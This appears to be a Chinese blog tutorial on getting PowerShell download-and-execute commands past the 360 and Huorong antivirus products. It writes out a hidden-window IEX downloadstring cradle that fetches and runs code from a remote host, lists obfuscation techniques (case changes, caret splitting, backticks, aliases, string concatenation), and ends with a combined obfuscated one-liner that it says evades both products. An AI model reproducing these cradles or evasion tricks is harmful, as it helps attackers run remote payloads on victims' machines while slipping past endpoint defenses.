Bypass_AV - Powershell命令免杀

0x01 前言

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.190.128:80/a'))"

现在powershell指令一般都会被拦截，且不说.ps1现在能不能过免杀，这次我们先来讨论powershell加载命令能否Bypass_AV

对于这种一句话，我们需要去思考！

0x02 官方文档

我们先去官网查看相关的文档

文档:

• https://docs.microsoft.com/zh-cn/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.1
• https://docs.microsoft.com/zh-cn/powershell/module/microsoft.powershell.core/about/about_aliases?view=powershell-7.1
• https://docs.microsoft.com/zh-cn/powershell/scripting/developer/cmdlet/required-development-guidelines?view=powershell-7.1

0x03 准备 && 思路

环境:Powershell 5

测试免杀环境:Windows 10

杀软:360 && 火绒

测试时间:2021年9月7日

将进行免杀的时候，我们需要思考一下思路都有什么？

• 大小写绕过
• 管道符
• 修改函数名
• 命令拆分
• 反引号处理

Tip:

进行Powershell命令绕过，我们可以先了解WEB方面的远程命令执行以及它的各种Bypass姿势，有助于我们对Powershell加载命令进行免杀

0x04 开始爬坑

大小写

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.190.128:80/a'))"

通过对整个语句进行大小写，看看能不能Bypass_AV

修改后:

0x05 组合拳

将上面的思路组合在一起来进行绕过

Powershell:

cmd /c echo set-alias -name xz -value IEX;x^z (New-Object "Ne`T.WeB`ClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://19’+'2.168.190.12'+'8/a') | p^o^w^e^r^s^h^e^l^l -

直接起飞，360 && 火绒 直接绕过执行命令

0x06 结尾

对于Powershell加载命令来说，多阅读官方文档肯定是没错的，多了解几个函数，几个功能！对于我们进行免杀是有莫大帮助的。方法肯定不止局限于我列举的这几种，推荐公众号 @XG小刚本文也以这个为参考。